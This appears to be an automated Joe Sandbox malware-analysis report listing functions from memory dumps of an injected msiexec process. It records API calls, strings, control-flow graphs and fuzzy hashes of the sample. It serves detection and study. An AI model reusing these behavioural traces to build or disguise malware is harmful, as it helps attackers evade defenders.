                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 463 ea86a0-ea86e9 call ea91f0 NtReadFile
                              APIs
                              • NtReadFile.NTDLL(00EA3D82,5E972F65,FFFFFFFF,?,?,?,00EA3D82,?,A:,FFFFFFFF,5E972F65,00EA3D82,?,00000000), ref: 00EA86E5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: A:
                              • API String ID: 2738559852-1209300218
                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                              • Instruction ID: 5fd3406c129c6ea1a8f92b8e48f78058e1b6a28d5e41b2f3d24230aec9a0ed12
                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                              • Instruction Fuzzy Hash: 20F0A4B2200208ABCB14DF89DC85EEB77EDAF8C754F158249BE1DA7241D630E811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA8720 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 470 ea8720-ea8749 call ea91f0 NtClose
                              APIs
                              • NtClose.NTDLL(`=,?,?,00EA3D60,00000000,FFFFFFFF), ref: 00EA8745
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID: `=
                              • API String ID: 3535843008-694307575
                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                              • Instruction ID: d90feaf285dba45277fe62b321b6f53da394683b39dd7a49f8d40c5f15bdb861
                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                              • Instruction Fuzzy Hash: A8D01776200218ABD710EB98CC89EA77BACEF48760F154499BA18AB242C530FA0086E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D495D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 54e5959b7c9787f2f07a086800339a1b7eae16f6b52afae5150ad957662fa104
                              • Instruction ID: 00f3e1c2e6837de69e1660bdec39b919d366f00e9692fb672cc092014966969c
                              • Opcode Fuzzy Hash: 54e5959b7c9787f2f07a086800339a1b7eae16f6b52afae5150ad957662fa104
                              • Instruction Fuzzy Hash: 4E9002A120200007650671594414626402BD7E4245B51C021E50055A1DC965D8D17175
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D49540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: d986fd3006f1585d8be7197b9b0ba70ba7c29c5b9abf246ab0da9c3fc6f1b9f3
                              • Instruction ID: 74783ead404c26a5a060f4dcd056f52327564153c8e9ecf88320a33247e6b5d0
                              • Opcode Fuzzy Hash: d986fd3006f1585d8be7197b9b0ba70ba7c29c5b9abf246ab0da9c3fc6f1b9f3
                              • Instruction Fuzzy Hash: 84900265211000072506A55907045170067D7D9395351C021F5006561CDA61D8E16171
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D496D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: fb21f37aab228afdd01a8f8d234d50ff929964fed531d180563b5789ff0530bd
                              • Instruction ID: c1b9ca161d4ccfecd86a1e8536d179cfb34b7580754e8feb84c35172ccab61f1
                              • Opcode Fuzzy Hash: fb21f37aab228afdd01a8f8d234d50ff929964fed531d180563b5789ff0530bd
                              • Instruction Fuzzy Hash: 9990027120100847F50161594404B560026D7E4345F51C016A4115665D8A55D8D17571
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D496E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 2be27914de118bb0ad3d825abefe4fce91055d8e4cda096968e0d5200109a27d
                              • Instruction ID: d8adf06b165ffb72afd90bad414ece31c0c7ca0c7a7f6bfb1d9792be74fe888b
                              • Opcode Fuzzy Hash: 2be27914de118bb0ad3d825abefe4fce91055d8e4cda096968e0d5200109a27d
                              • Instruction Fuzzy Hash: 4690027120108807F5116159840475A0026D7D4345F55C411A8415669D8AD5D8D17171
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D49FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: aed352d677f879a9c844830a00e70e49314be865b52c01c975c0f6dd8ccc09d8
                              • Instruction ID: 10755118722a2e3d5213c788cd90b96d36164c992c762abdc5c94ec74176c91c
                              • Opcode Fuzzy Hash: aed352d677f879a9c844830a00e70e49314be865b52c01c975c0f6dd8ccc09d8
                              • Instruction Fuzzy Hash: 4D90027131114407F511615984047160026D7D5245F51C411A4815569D8AD5D8D17172
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D49780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: eeb4bbc97ce30020a58a72487ccd2dca6f1a475e3618d536b77851531f459ef3
                              • Instruction ID: c3f7c06d942f6fa1c765aab8419422451e59b0cde29e12033910affab092733e
                              • Opcode Fuzzy Hash: eeb4bbc97ce30020a58a72487ccd2dca6f1a475e3618d536b77851531f459ef3
                              • Instruction Fuzzy Hash: 3190026921300007F5817159540861A0026D7D5246F91D415A4006569CCD55D8E96371
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D49710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: e1eae3d24c29f68b416d19c762311a9cb023d6efcd1a1a4e2801be0a6bccdb08
                              • Instruction ID: 405ce9e05903a509f87b6b5bef32a93de508473e3a3440ffe6465f07eef14117
                              • Opcode Fuzzy Hash: e1eae3d24c29f68b416d19c762311a9cb023d6efcd1a1a4e2801be0a6bccdb08
                              • Instruction Fuzzy Hash: 7590027120100407F501659954086560026D7E4345F51D011A9015566ECAA5D8D17171
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D49840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 87b7747212743c6fb9a9e856960d62439b2c809bbcd5784c618a29f30b70795e
                              • Instruction ID: 6dbbc1bde090bdf8b7e8a842120601c07f9cd1d6d3ff2ad988fe6beb003fbc7f
                              • Opcode Fuzzy Hash: 87b7747212743c6fb9a9e856960d62439b2c809bbcd5784c618a29f30b70795e
                              • Instruction Fuzzy Hash: DF900261242041577946B15944045174027E7E4285791C012A5405961C8966E8D6E671
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D49860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: e7ffda01e1a0fb26c7004b935f4314120ce202eaabade2006b41c6b4fbe9a6d5
                              • Instruction ID: ecd16f8c2f7bce230b2782348d6c73f3ad40cbfa4e5e8f2c1169a1f8aa148745
                              • Opcode Fuzzy Hash: e7ffda01e1a0fb26c7004b935f4314120ce202eaabade2006b41c6b4fbe9a6d5
                              • Instruction Fuzzy Hash: 9390027120100417F51261594504717002AD7D4285F91C412A4415569D9A96D9D2B171
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D499A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: a4627f9d31810aa594a675633fbf4b8e6ee1e38ed2c95323fe14a53e2f5aa186
                              • Instruction ID: d294e41e0e80232f9b66d59f52d87a23cf6bf0d61883b3c0a87b2db262c56762
                              • Opcode Fuzzy Hash: a4627f9d31810aa594a675633fbf4b8e6ee1e38ed2c95323fe14a53e2f5aa186
                              • Instruction Fuzzy Hash: 5C9002A134100447F50161594414B160026D7E5345F51C015E5055565D8A59DCD27176
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D49910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: e238e4b4f802365cf7b9757f141561ca0ea8a6dc53d6a95da5a7b60269e51894
                              • Instruction ID: 62360b0bd933b0bfb8432f1b2ed6a2c1c6b37e2c27357c0785e89671665d5c43
                              • Opcode Fuzzy Hash: e238e4b4f802365cf7b9757f141561ca0ea8a6dc53d6a95da5a7b60269e51894
                              • Instruction Fuzzy Hash: D29002B120100407F541715944047560026D7D4345F51C011A9055565E8A99DDD576B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D49A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 17556edda7149db2769eda6447887e24bbec9c94a129c0c6e96f8aa6e0dc9135
                              • Instruction ID: 678e5ff29de4419d81ed4e8c58f397f997e24d9ee2ca0b6bec75fb2a486490cd
                              • Opcode Fuzzy Hash: 17556edda7149db2769eda6447887e24bbec9c94a129c0c6e96f8aa6e0dc9135
                              • Instruction Fuzzy Hash: 6C90026121180047F60165694C14B170026D7D4347F51C115A4145565CCD55D8E16571
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA7310 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 323 ea7310-ea733f 324 ea734b-ea7352 323->324 325 ea7346 call eaa030 323->325 326 ea7358-ea73a8 call eaa100 call e99b50 call ea3e60 324->326 327 ea742c-ea7432 324->327 325->324 334 ea73b0-ea73c1 Sleep 326->334 335 ea73c3-ea73c9 334->335 336 ea7426-ea742a 334->336 337 ea73cb-ea73f1 call ea6f40 335->337 338 ea73f3-ea7413 335->338 336->327 336->334 340 ea7419-ea741c 337->340 338->340 341 ea7414 call ea7140 338->341 340->336 341->340
                              APIs
                              • Sleep.KERNELBASE(000007D0), ref: 00EA73B8
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: net.dll$wininet.dll
                              • API String ID: 3472027048-1269752229
                              • Opcode ID: da5fb0b75839d44f35078513e4ad2cfb4f529d3ffac09f8c45bc59b509037f56
                              • Instruction ID: 2735ae6f113973c6529b633531148ee50f33da54bb5d74db0e0cb732e7d6a52e
                              • Opcode Fuzzy Hash: da5fb0b75839d44f35078513e4ad2cfb4f529d3ffac09f8c45bc59b509037f56
                              • Instruction Fuzzy Hash: B4318EB6606600ABD711DF64CCA1FABB7F8AB8D704F04811DFA5A6B241D730B549CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA7306 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 343 ea7306-ea7352 call eaa030 347 ea7358-ea73a8 call eaa100 call e99b50 call ea3e60 343->347 348 ea742c-ea7432 343->348 355 ea73b0-ea73c1 Sleep 347->355 356 ea73c3-ea73c9 355->356 357 ea7426-ea742a 355->357 358 ea73cb-ea73f1 call ea6f40 356->358 359 ea73f3-ea7413 356->359 357->348 357->355 361 ea7419-ea741c 358->361 359->361 362 ea7414 call ea7140 359->362 361->357 362->361
                              APIs
                              • Sleep.KERNELBASE(000007D0), ref: 00EA73B8
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: net.dll$wininet.dll
                              • API String ID: 3472027048-1269752229
                              • Opcode ID: 5c9fa38d1ddc135c1141c323c1fd4a01dac11c65d7a636f86de1366a056800b5
                              • Instruction ID: 083dcbabf63c6baf7e7ba47ea26093054afffcad5ecf05518ff94a71d81164c6
                              • Opcode Fuzzy Hash: 5c9fa38d1ddc135c1141c323c1fd4a01dac11c65d7a636f86de1366a056800b5
                              • Instruction Fuzzy Hash: D421BFB2A05200ABD710DF64CCA1FABB7B4AB89704F04801DF6696F241D774B545CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA8900 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 467 ea8900-ea8931 call ea91f0 RtlFreeHeap
                              APIs
                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E93B93), ref: 00EA892D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID: .z`
                              • API String ID: 3298025750-1441809116
                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                              • Instruction ID: 21c997a45466ccab197138ef9500c4aaac059242669e65ffb8e554d911153bae
                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                              • Instruction Fuzzy Hash: 07E04FB12002086BD714DF59CC49EA777ACEF88750F014555FD085B242C630F910CAF0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00E97290 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E972EA
                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E9730B
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID:
                              • API String ID: 1836367815-0
                              • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                              • Instruction ID: a0a59555704adcc0b152e930395e404d96bf2ad566d4327fbc2e3823a616ccf0
                              • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                              • Instruction Fuzzy Hash: A901A771A9032876EB21A6949C03FBE77AC5B05F51F144118FF04BA1C2E794790687F6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00E99B50 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E99BC2
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                              • Instruction ID: 80c7ea2e1507400991f55bd892115b13d5e5fa5d2599777881293df30971d384
                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                              • Instruction Fuzzy Hash: 010112B5D0020DABDF10DAA4DC42F9DB7B89B54308F004195E908AB142F675EB14CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA8970 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EA89C4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateInternalProcess
                              • String ID:
                              • API String ID: 2186235152-0
                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                              • Instruction ID: a32f670c2f41b8564d38a4d1e95e23eb53cc22fd9bb54eeff4f85d3caa398967
                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                              • Instruction Fuzzy Hash: 1601AFB2210108ABCB54DF89DC80EEB77EDAF8C754F158258BA0DA7241C630E851CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA7440 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E9CD00,?,?), ref: 00EA747C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                              • Instruction ID: ecca51ab59334c8a5cf700c46b658c2d274b934c15c27cc82a989ba5e9901c14
                              • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                              • Instruction Fuzzy Hash: ACE092333843143AE33065AD9C03FA7B39CDB86B24F240026FA4DFB2C1D995F80142A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA7433 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E9CD00,?,?), ref: 00EA747C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: dff39591e1c7cef6e03fdc10b279e500c396836549ca8450aba43b775e7902a9
                              • Instruction ID: 0c17855caa62ab8dfd9ed7c3f0cbf266d56289ef9b0ff75513e2562e9c87c39f
                              • Opcode Fuzzy Hash: dff39591e1c7cef6e03fdc10b279e500c396836549ca8450aba43b775e7902a9
                              • Instruction Fuzzy Hash: B9F0207228430436E230A5AC8C03F9BBB9CDB8AF10F144129F68ABB1C2D9A0F80542A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA8A53 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E9CFD2,00E9CFD2,?,00000000,?,?), ref: 00EA8A90
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              • Opcode ID: dfba2c46a13f7f54b928f8f99597c75a34eae51b4fe70eb6c6161372265b54aa
                              • Instruction ID: 1c82b461fea47d94a82f48647e270973dadfe1630d2a0ef2edc5d2a70ae1314a
                              • Opcode Fuzzy Hash: dfba2c46a13f7f54b928f8f99597c75a34eae51b4fe70eb6c6161372265b54aa
                              • Instruction Fuzzy Hash: 9CE06DB12003196BC720DF89CC86EDB37A9AF88650F018169FD0D6B242C931ED058BE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA8A60 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                              Download Yara Rule
                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E9CFD2,00E9CFD2,?,00000000,?,?), ref: 00EA8A90
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                              • Instruction ID: fbae43f63464cb5e4314f61aab73725e31cc579a6bf3a000a4e73f0f244bc201
                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                              • Instruction Fuzzy Hash: 0DE01AB12002086BDB10DF49CC85EE737ADAF89650F018155BE086B242C930F8108BF5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00E9D440 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNELBASE(00008003,?,?,00E97C93,?), ref: 00E9D46B
                              Memory Dump Source
